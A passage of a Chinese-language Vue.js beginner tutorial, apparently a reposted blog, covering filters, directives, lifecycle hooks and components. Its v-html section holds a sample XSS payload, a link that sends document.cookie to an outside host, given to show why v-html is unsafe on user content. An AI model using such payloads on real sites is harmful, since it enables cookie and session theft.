                console.log(JSON.stringify(this.userInfo))
            }
        }
    })
</script>

过滤器

过滤器:
    定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理)。
    语法:
        1.注册过滤器:Vue.filter(name,callback) 或 new Vue{filters:{}}
        2.使用过滤器:{{ xxx | 过滤器名}}  或  v-bind:属性 = "xxx | 过滤器名"
    备注:
        1.过滤器也可以接收额外参数、多个过滤器也可以串联
        2.并没有改变原本的数据, 是产生新的对应的数据

准备好一个容器
<div id="root">
    <h2>显示格式化后的时间</h2>

    计算属性实现 
    <h3>现在是:{{fmtTime}}</h3>

    methods实现 
    <h3>现在是:{{getFmtTime()}}</h3>

    过滤器实现 
    <h3>现在是:{{time | timeFormater}}</h3>

    过滤器实现(传参) 
    <h3>现在是:{{time | timeFormater('YYYY_MM_DD') | mySlice}}</h3>
    <h3 :x="msg | mySlice">尚</h3>
</div>

<div id="root2">
    <h2>{{msg | mySlice}}</h2>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    全局过滤器
    Vue.filter('mySlice',function(value){
        return value.slice(0,4)
    })
            
    new Vue({
        el:'#root',
        data:{
            time:1621561377603, //时间戳
            msg:'你好,尚'
        },
        computed: {
            fmtTime(){
                return dayjs(this.time).format('YYYY年MM月DD日 HH:mm:ss')
            }
        },
        methods: {
            getFmtTime(){
                return dayjs(this.time).format('YYYY年MM月DD日 HH:mm:ss')
            }
        },
        局部过滤器
        filters:{
            timeFormater(value,str='YYYY年MM月DD日 HH:mm:ss'){
                console.log('@',value)
                return dayjs(value).format(str)
            }
        }
    })
    new Vue({
        el:'#root2',
        data:{
            msg:'hello,atguigu!'
        }
    })
</script>

内置指令

我们学过的指令:
    v-bind  : 单向绑定解析表达式, 可简写为 :xxx
    v-model : 双向数据绑定
    v-for   : 遍历数组/对象/字符串
    v-on    : 绑定事件监听, 可简写为@
    v-if    : 条件渲染(动态控制节点是否存存在)
    v-else  : 条件渲染(动态控制节点是否存存在)
    v-show  : 条件渲染 (动态控制节点是否展示)
v-text指令:
    1.作用:向其所在的节点中渲染文本内容。
    2.与插值语法的区别:v-text会替换掉节点中的内容,{{xx}}则不会。

    准备好一个容器
    <div id="root">
        <div>你好,{{name}}</div>
        <div v-text="name"></div>
        <div v-text="str"></div>
    </div>
</body>

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    
    new Vue({
        el:'#root',
        data:{
            name:'尚',
            str:'<h3>你好啊!</h3>'
        }
    })
</script>

v-html指令:
    1.作用:向指定节点中渲染包含html结构的内容。

    2.与插值语法的区别:
            (1).v-html会替换掉节点中所有的内容,{{xx}}则不会。
            (2).v-html可以识别html结构。

    3.严重注意:v-html有安全性问题!!!!
            (1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。
            (2).一定要在可信的内容上使用v-html,永不要用在用户提交的内容上!

准备好一个容器
<div id="root">
    <div>你好,{{name}}</div>
    <div v-html="str"></div>
    <div v-html="str2"></div>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    new Vue({
        el:'#root',
        data:{
            name:'尚',
            str:'<h3>你好啊!</h3>',
            str2:'<a href=javascript:location.href=
             "http://www.baidu.com?"+document.cookie>快来!</a>',
        }
    })
</script>

v-cloak指令(没有值)
<head>
    <meta charset="UTF-8" />
    <title>v-cloak指令</title>
    <style>
        [v-cloak]{
            display:none;
        }
    </style>
    <!-- 引入Vue -->
</head>
<body>
    
    v-cloak指令(没有值):
        1.本质是一个特殊属性,Vue实例创建完毕并接管容器后,会删掉v-cloak属性。
        2.使用css配合v-cloak可以解决网速慢时页面展示出{{xxx}}的问题。
    
    <!-- 准备好一个容器-->
    <div id="root">
        <h2 v-cloak>{{name}}</h2>
    </div>
    <script type="text/javascript" 
    src="http://localhost:8080/resource/5s/vue.js"></script>
</body>

<script type="text/javascript">
    console.log(1)
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    new Vue({
        el:'#root',
        data:{
            name:'尚'
        }
    })
</script>

 
 v-once指令:
    1.v-once所在节点在初次动态渲染后,就视为静态内容了。

    2.以后数据的改变不会引起v-once所在结构的更新,可以用于优化性能。
    
<!-- 准备好一个容器-->
<div id="root">
    <h2 v-once>初始化的n值是:{{n}}</h2>
    <h2>当前的n值是:{{n}}</h2>
    <button @click="n++">点我n+1</button>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    
    new Vue({
        el:'#root',
        data:{
            n:1
        }
    })
</script>

 
v-pre指令:
    1.跳过其所在节点的编译过程。

    2.可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。

<!-- 准备好一个容器-->
    <div id="root">
        <h2 v-pre>Vue其实很简单</h2>
        <h2 >当前的n值是:{{n}}</h2>
        <button @click="n++">点我n+1</button>
    </div>
</body>

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    new Vue({
        el:'#root',
        data:{
            n:1
        }
    })
</script>

自定义指令

    需求1:定义一个v-big指令,和v-text功能类似
          但会把绑定的数值放大10倍。
    需求2:定义一个v-fbind指令,和v-bind功能类似
          但可以让其所绑定的input元素默认获取焦点。
    自定义指令总结:

一、定义语法:

(1).局部指令:
    new Vue({                               new Vue({
        directives:{指令名:配置对象}  或         directives{指令名:回调函数}
    })                                      })

(2).全局指令:
   Vue.directive(指令名,配置对象) 或   Vue.directive(指令名,回调函数)

二、配置对象中常用的3个回调:
    (1).bind:指令与元素成功绑定时调用。
    (2).inserted:指令所在元素被插入页面时调用。
    (3).update:指令所在模板结构被重新解析时调用。

三、备注:
    1.指令定义时不加v-,但使用时要加v-;
    2.指令名如果是多个单词,要使用kebab-case命名方式,不要用camelCase命名。

<!-- 准备好一个容器-->
<div id="root">
    <h2>{{name}}</h2>
    <h2>当前的n值是:<span v-text="n"></span> </h2>
    <h2>放大10倍后的n值是:<span v-big-number="n"></span> </h2>
    <h2>放大10倍后的n值是:<span v-big="n"></span> </h2>
    <button @click="n++">点我n+1</button>
    <hr/>
    <input type="text" v-fbind:value="n">
</div>

<script type="text/javascript">
    Vue.config.productionTip = false

    定义全局指令
    Vue.directive('fbind',{
        指令与元素成功绑定时(一上来)
        bind(element,binding){
            element.value = binding.value
        },
        指令所在元素被插入页面时
        inserted(element,binding){
            element.focus()
        },
        指令所在的模板被重新解析时
        update(element,binding){
            element.value = binding.value
        }
    })

    new Vue({
        el:'#root',
        data:{
            name:'尚',
            n:1
        },
        directives:{
            big函数何时会被调用?
             1.指令与元素成功绑定时(一上来)
             2.指令所在的模板被重新解析时
            'big-number'(element,binding){
                // console.log('big')
                element.innerText = binding.value * 10
            }, 
            big(element,binding){
                console.log('big',this) //注意此处的this是window
                // console.log('big')
                element.innerText = binding.value * 10
            },
            fbind:{
                指令与元素成功绑定时(一上来)
                bind(element,binding){
                    element.value = binding.value
                },
                指令所在元素被插入页面时
                inserted(element,binding){
                    element.focus()
                },
                指令所在的模板被重新解析时
                update(element,binding){
                    element.value = binding.value
                }
            }
        }
    })
</script>

生命周期函数

引出生命周期

生命周期:
   1.又名:生命周期回调函数、生命周期函数、生命周期钩子。
   2.是什么:Vue在关键时刻帮我们调用的一些特殊名称的函数。
   3.生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
   4.生命周期函数中的this指向是vm 或 组件实例对象。

 准备好一个容器
<div id="root">
    <h2 v-if="a">你好啊</h2>
    <h2 :style="{opacity}">欢迎学习Vue</h2>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
    
        new Vue({
        el:'#root',
        data:{
            a:false,
            opacity:1
        },
        methods: {
            
        },
        Vue完成模板的解析并把初始的真实DOM元素放入页面后(挂载完毕)调用mounted
        mounted(){
            console.log('mounted',this)
            setInterval(() => {
                this.opacity -= 0.01
                if(this.opacity <= 0) this.opacity = 1
            },16)
        },
    })
    通过外部的定时器实现(不推荐)
    setInterval(() => {
        vm.opacity -= 0.01
        if(vm.opacity <= 0) vm.opacity = 1
    },16) 
</script>

常用的生命周期钩子:
    1.mounted: 发送ajax请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】。
    2.beforeDestroy: 清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】。

关于销毁Vue实例
    1.销毁后借助Vue开发者工具看不到任何信息。
    2.销毁后自定义事件会失效,但原生DOM事件依然有效。
    3.一般不会在beforeDestroy操作数据,因为即便操作数据,也不会再触发更新流程了。

准备好一个容器
<div id="root">
    <h2 :style="{opacity}">欢迎学习Vue</h2>
    <button @click="opacity = 1">透明度设置为1</button>
    <button @click="stop">点我停止变换</button>
</div> 

<script type="text/javascript">
    Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
        new Vue({
        el:'#root',
        data:{
            opacity:1
        },
        methods: {
            stop(){
                this.$destroy()
            }
        },
        Vue完成模板的解析并把初始的真实DOM元素放入页面后(挂载完毕)调用mounted
        mounted(){
            console.log('mounted',this)
            this.timer = setInterval(() => {
                console.log('setInterval')
                this.opacity -= 0.01
                if(this.opacity <= 0) this.opacity = 1
            },16)
        },
        beforeDestroy() {
            clearInterval(this.timer)
            console.log('vm即将驾鹤西游了')
        },
    })
</script>

非单文件组件

Vue中使用组件的三大步骤:
    一、定义组件(创建组件)
    二、注册组件
    三、使用组件(写组件标签)

一、如何定义一个组件?
    使用Vue.extend(options)创建,其中options和
    new Vue(options)时传入的那个options几乎一样,但也有点区别;

    1.el不要写,为什么?
      最终所有的组件都要经过一个vm的管理,由vm中的el决定服务哪个容器。

    2.data必须写成函数,为什么?
     避免组件被复用时,数据存在引用关系。
     备注:使用template可以配置组件结构。

二、如何注册组件?
    1.局部注册:靠new Vue的时候传入components选项
    2.全局注册:靠Vue.component('组件名',组件)

三、编写组件标签:
    <school></school>

<!-- 准备好一个容器-->
<div id="root">
    <hello></hello>
    <hr>
    <h1>{{msg}}</h1>
    <hr>
    第三步:编写组件标签
    <school></school>
    <hr>
    第三步:编写组件标签
    <student></student>
</div>

<div id="root2">
    <hello></hello>
</div>

<script type="text/javascript">
    Vue.config.productionTip = false
    第一步:创建school组件
    const school = Vue.extend({
        template:`
            <div class="demo">
                <h2>学校名称:{{schoolName}}</h2>
                <h2>学校地址:{{address}}</h2>
                <button @click="showName">点我提示学校名</button>  
            </div>
        `,
        // el:'#root', //组件定义时,一定不要写el配置项
       因为最终所有的组件都要被一个vm管理,由vm决定服务于哪个容器。
        data(){
            return {
                schoolName:'尚',
                address:'北京昌平'
            }
        },
        methods: {
            showName(){
                alert(this.schoolName)
            }
        },
    })
    第一步:创建student组件
    const student = Vue.extend({
        template:`
            <div>
                <h2>学生姓名:{{studentName}}</h2>
                <h2>学生年龄:{{age}}</h2>
            </div>
        `,
        data(){
            return {
                studentName:'张三',
                age:18
            }
        }
    })
    
    第一步:创建hello组件
    const hello = Vue.extend({
        template:`
            <div>   
                <h2>你好啊!{{name}}</h2>
            </div>
        `,
        data(){
            return {
                name:'Tom'
            }
        }
    })
    
    第二步:全局注册组件
    Vue.component('hello',hello)
    创建vm
    new Vue({
        el:'#root',
        data:{
            msg:'你好啊!'
        },
        第二步:注册组件(局部注册)
        components:{
            school,
            student
        }
    })
    new Vue({
        el:'#root2',
    })
</script>

几个注意点:
1.关于组件名:
    一个单词组成:
        第一种写法(首字母小写):school
        第二种写法(首字母大写):School
    多个单词组成:
        第一种写法(kebab-case命名):my-school
        第二种写法(CamelCase命名):MySchool (需要Vue脚手架支持)
    备注:
        (1).组件名尽可能回避HTML中已有的元素名称,例如:h2、H2都不行。
        (2).可以使用name配置项指定组件在开发者工具中呈现的名字。

2.关于组件标签:
    第一种写法:<school></school>
    第二种写法:<school/>
    备注:不用使用脚手架时,<school/>会导致后续组件不能渲染。

3.一个简写方式:
const school = Vue.extend(options) 可简写为:const school = options

组件嵌套
    const student = Vue.extend({
        name:'student',
        template:`
            <div>
                <h2>学生姓名:{{name}}</h2>  
                <h2>学生年龄:{{age}}</h2>   
            </div>
        `,
        data(){
            return {
                name:'尚',
                age:18
            }
        }
    })
        
    定义school组件
    const school = Vue.extend({
        name:'school',
        template:`
            <div>
                <h2>学校名称:{{name}}</h2>  
                <h2>学校地址:{{address}}</h2>   
                <student></student>
            </div>
        `,
        data(){
            return {
                name:'尚',
                address:'北京'
            }
        },
        注册组件(局部)
        components:{
            student
        }
    })

    定义hello组件
    const hello = Vue.extend({
        template:`<h1>{{msg}}</h1>`,
        data(){
            return {
                msg:'欢迎尚!'
            }
        }
    })
    
    定义app组件
    const app = Vue.extend({
        template:`
            <div>   
                <hello></hello>
                <school></school>
            </div>
        `,
        components:{
            school,
            hello
        }
    })

    创建vm
    new Vue({
        template:'<app></app>',
        el:'#root',
        //注册组件(局部)
        components:{app}
    })

 关于VueComponent:

    1.school组件本质是一个名为VueComponent的构造函数
      且不是程序员定义的,是Vue.extend生成的。

    2.我们只需要写<school/>或<school></school>
      Vue解析时会帮我们创建school组件的实例对象
      即Vue帮我们执行的:new VueComponent(options)。

    3.特别注意:每次调用Vue.extend,返回的都是一个全新的VueComponent

    4.关于this指向:
        (1).组件配置中:
            data函数、methods中的函数、watch中的函数
            computed中的函数 它们的this均是【VueComponent实例对象】。
        (2).new Vue(options)配置中:
            data函数、methods中的函数、watch中的函数
            computed中的函数 它们的this均是【Vue实例对象】。

    5.VueComponent的实例对象,以后简称vc(也可称之为:组件实例对象)。
        Vue的实例对象,以后简称vm。

1.    一个重要的内置关系:VueComponent.prototype.__proto__ === Vue.prototype
2.为什么要有这个关系:让组件实例对象(vc)可以访问到 Vue原型上的属性、方法。

单文件组件

School.vue

<template>
template 里写结构
  <div>
      <h2>学校名称:{{name}}</h2>
      <h2>学校地址:{{address}}</h2>
  </div>
</template>

<script>
写脚本
export default {
    组件名称
    name:"School",
    数据对应结构
    data(){
        return {
            name :"尚",
            address:'北京'
        }
    }
}
</script>

App.vue

<template>
    <div>
        编写组件标签
        <School></School> 
        <Student></Student>
    </div>
</template>

<script>
import School from 'School.vue' //引入组件
import Student from 'Student.vue'
export default {
    name:"App",
    components: { School, Student },// 注册组件   
}
</script>

Main.js

import App from 'App.vue'  //引入App

创建vue实例  并指定为root容器服务
new Vue({
    el:'root',
    结构
    template:`  
    <App></App>
    `,
    components:{
        App  //注册App
    }
})

html文件 需在脚手架中使用

<body>
    <div class="root"></div>
    <script src="../js/vue.js"></script>
    <script src="main.js"></script>
</body>
标签: vue.js 前端

本文转载自: https://blog.csdn.net/weixin_58614421/article/details/123850580
版权归原作者 爱笑的满月 所有, 如有侵权,请联系我们删除。

“万字Vue基础,初学者必备”的评论:

还没有评论